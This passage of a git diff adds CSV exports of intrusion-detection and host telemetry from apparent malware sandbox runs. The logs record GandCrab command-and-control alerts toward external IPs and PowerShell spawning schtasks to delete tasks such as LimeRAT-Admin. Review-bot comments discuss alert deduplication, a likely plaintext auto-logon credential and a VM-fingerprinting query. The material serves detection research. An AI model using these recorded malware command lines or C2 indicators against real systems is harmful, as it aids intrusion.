204.11.56.48:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:30:15.230","05/29/2020-12:30:11.000714 [**] [1:2010067:10] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50048 -> 204.11.56.48:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:30:15.230","05/29/2020-12:30:13.102669 [**] [1:2010067:10] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50108 -> 77.104.144.25:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:28:45.216","05/29-12:28:43.539075 [**] [1:2010067:9] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49984 -> 92.53.96.201:80","/var/log/snort/alert.fast" +"May 29, 2020 @ 12:28:45.215","05/29/2020-12:28:43.699392 [**] [1:2010067:10] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49984 -> 92.53.96.201:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:28:45.215","05/29/2020-12:28:43.699392 [**] [1:2025638:3] ET MALWARE [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49984 -> 92.53.96.201:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:28:45.215","05/29-12:28:43.539075 [**] [1:2025638:4] ET TROJAN [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49984 -> 92.53.96.201:80","/var/log/snort/alert.fast" diff --git a/data/MW_24_HIDS_3.csv b/data/MW_24_HIDS_3.csv new file mode 100644 index 0000000..01e2fa2 --- /dev/null +++ b/data/MW_24_HIDS_3.csv 
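Review bot: Each network event appears twice in this file, once from `/var/log/snort/alert.fast` (timestamp `05/29-12:31:09.496897`, no year) and once from `/var/log/suricata/fast.log` (`05/29/2020-12:31:09.987333`), with the same signature id (`1:2010066`, `1:2025638`) at different rule revisions and under different class names (`ET TROJAN` / `A Network Trojan was detected` vs `ET MALWARE` / `Malware Command and Control Activity Detected`). Counting alert rows therefore double-counts every detection, and the overview's Result_NIDS figure should say whether it is deduplicated on sid and five-tuple. The `@timestamp` column also appears to be the log-shipper's ingest time rather than the event time — five alerts spanning 12:31:09 to 12:31:11 all carry `12:31:12.277` — so the event time has to be parsed from the `message` field, and the Snort format needs the year supplied from `@timestamp`.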
@@ -0,0 +1,28 @@
+timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details"
+"May 29, 2020 @ 13:13:51.370",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed.
+Old md5sum was: '7fa7290c3b0e7b2d8ed5a092299db356'
+New md5sum is : '7b0e21ee99623454e8d06871f064ed98'
+Old sha1sum was: '27735fff26a4f9093576dfbd77d06599094d3497'
+New sha1sum is : 'f63735bbc2e72216030f4e994b7c9785856a9170'
+",
+"May 29, 2020 @ 13:11:24.587",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed.
+Old md5sum was: '7b0e21ee99623454e8d06871f064ed98'
+New md5sum is : '7fa7290c3b0e7b2d8ed5a092299db356'
+Old sha1sum was: 'f63735bbc2e72216030f4e994b7c9785856a9170'
+New sha1sum is : '27735fff26a4f9093576dfbd77d06599094d3497'
+",
+"May 29, 2020 @ 13:11:23.463",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed.
+Old md5sum was: '2cf3ce4970fb25f9237c226b8de91a23'
+New md5sum is : 'f6ca07d87221fc6857f68c29d1d4417a'
+Old sha1sum was: '8f5edce88e798c3b3085f743cc79f804540ea6ae'
+New sha1sum is : '6cb461f02b7157b4c53566f2f9182bf18d0fc230'
+",
+"May 29, 2020 @ 13:11:23.429",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed.
+Old md5sum was: '758365bbcd458b2a523c7ab4132c04af'
+New md5sum is : 'f8206196eadb30fd99582bb7dd32d415'
+Old sha1sum was: '691b9f4c6de22a25538af85b815563825e93ed4f'
+New sha1sum is : '60905a2da095cef03af60ac4320a83eebfc04a12'
+",
+"May 29, 2020 @ 13:09:55.800",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,,
+"May 29, 2020 @ 13:09:45.788",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,,
+"May 29, 2020 @ 13:06:06.572",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = DESKTOP-HUE026H\John Williams; ClientProcessId = 6448; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_Bios; ResultCode = 0x80041032; PossibleCause = Unknown""",,,,
diff --git a/data/MW_24_NIDS.csv b/data/MW_24_NIDS.csv
new file mode 100644
index 0000000..583be86
--- /dev/null
+++ b/data/MW_24_NIDS.csv
@@ -0,0 +1,3 @@
+"@timestamp",message,"log.file.path"
+"May 29, 2020 @ 13:10:55.801","05/29-13:10:54.291134 [**] [1:2014819:1] ET INFO Packed Executable Download [**] [Classification: Misc activity] [Priority: 3] {TCP} 173.194.144.25:80 -> 172.16.2.2:49692","/var/log/snort/alert.fast"
+"May 29, 2020 @ 13:09:20.791","05/29-13:09:12.995986 [**] [1:2014819:1] ET INFO Packed Executable Download [**] [Classification: Misc activity] [Priority: 3] {TCP} 173.194.144.25:80 -> 172.16.2.2:50154","/var/log/snort/alert.fast"
diff --git a/data/MW_25_HIDS_3.csv b/data/MW_25_HIDS_3.csv
new file mode 100644
index 0000000..197a325
--- /dev/null
+++ b/data/MW_25_HIDS_3.csv
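Review bot: The two Winlogon rows at 13:11:23 carry only old/new MD5 and SHA-1 of the key, so this export cannot show which values under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon were written; the only row that names the change is the level-9 benchmark event at 13:09:55, where the 'MSS: (AutoAdminLogon) Enable Automatic Logon' check flips from 'not applicable' to failed. Automatic logon is normally configured by setting AutoAdminLogon together with DefaultUserName/DefaultPassword in that same key, so after this sample the analysis VM's logon credential is presumably stored in the registry in cleartext; that deserves a line in the dataset notes for this sample, e.g. `# MW_24: sample enables AutoAdminLogon (Winlogon key modified 13:11:23) - treat snapshots/exports of this VM as containing a plaintext credential`. The 13:06:06 row also records a WMI `SELECT SerialNumber FROM Win32_Bios` query from ClientProcessId 6448 returning 0x80041032 (WBEM_E_CALL_CANCELLED), a query commonly used for VM/sandbox fingerprinting, but with no Sysmon process-create row in this file the querying image cannot be confirmed from here. The Active Setup key flipping between the same two checksum pairs at 13:11:24 and 13:13:51 reads like a value being set and reverted and is likely benign, yet with checksum-only events it is indistinguishable from the Winlogon change; if the collector supports reporting registry value diffs, enabling that for these keys would make the file self-explanatory.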
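Review bot: The only two network rows for this sample are priority-3 'ET INFO Packed Executable Download' hits (sid 2014819) from 173.194.144.25:80 toward the victim, and by its name that signature matches a packed PE being served over HTTP rather than anything the sample itself sends, so a NIDS 'detected' verdict derived from this file would rest on an inbound download, not on C2 or exfiltration. The fast.log text carries no HTTP Host or URI, so the server cannot be attributed from these rows alone; keeping the matching Suricata http/fileinfo record or the pcap next to the CSV would let a reader tie the download to the sample, and the dataset notes should say which of the two downloads (13:09:12 or 13:10:54) is the sample itself, if either. Also, only /var/log/snort/alert.fast appears here, whereas the NIDS export earlier in this commit pairs each Snort alert with a Suricata fast.log line, so the Suricata side for this sample may be missing from the export rather than genuinely empty.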
@@ -0,0 +1,23321 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 29, 2020 @ 14:23:40.603",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '7fa7290c3b0e7b2d8ed5a092299db356' +New md5sum is : '7b0e21ee99623454e8d06871f064ed98' +Old sha1sum was: '27735fff26a4f9093576dfbd77d06599094d3497' +New sha1sum is : 'f63735bbc2e72216030f4e994b7c9785856a9170' +", +"May 29, 2020 @ 14:21:10.763",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:42.141 +ProcessGuid: {df9fc3d3-b41a-5ecf-0000-0010627d3100} +ProcessId: 4220 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ECDnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:42.146393800Z"",""eventRecordID"":""3983"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:42.141\r\nProcessGuid: {df9fc3d3-b41a-5ecf-0000-0010627d3100}\r\nProcessId: 4220\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:42.141"",""processGuid"":""{df9fc3d3-b41a-5ecf-0000-0010627d3100}"",""processId"":""4220"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ECDnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.749",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:42.086 +ProcessGuid: {df9fc3d3-b41a-5ecf-0000-0010507b3100} +ProcessId: 7788 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:42.097003800Z"",""eventRecordID"":""3982"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:42.086\r\nProcessGuid: {df9fc3d3-b41a-5ecf-0000-0010507b3100}\r\nProcessId: 7788\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:42.086"",""processGuid"":""{df9fc3d3-b41a-5ecf-0000-0010507b3100}"",""processId"":""7788"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.732",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:42.034 +ProcessGuid: {df9fc3d3-b41a-5ecf-0000-00108a793100} +ProcessId: 1820 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for Windows Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD 
+TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:42.038215100Z"",""eventRecordID"":""3981"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:42.034\r\nProcessGuid: {df9fc3d3-b41a-5ecf-0000-00108a793100}\r\nProcessId: 1820\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:42.034"",""processGuid"":""{df9fc3d3-b41a-5ecf-0000-00108a793100}"",""processId"":""1820"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for Windows Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.721",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.971 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-0010d8773100} +ProcessId: 6008 
+Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.976759600Z"",""eventRecordID"":""3980"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.971\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-0010d8773100}\r\nProcessId: 6008\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.971"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-0010d8773100}"",""processId"":""6008"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 
5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.702",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.923 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-001042763100} +ProcessId: 8076 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN LimeRAT-Admin /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" 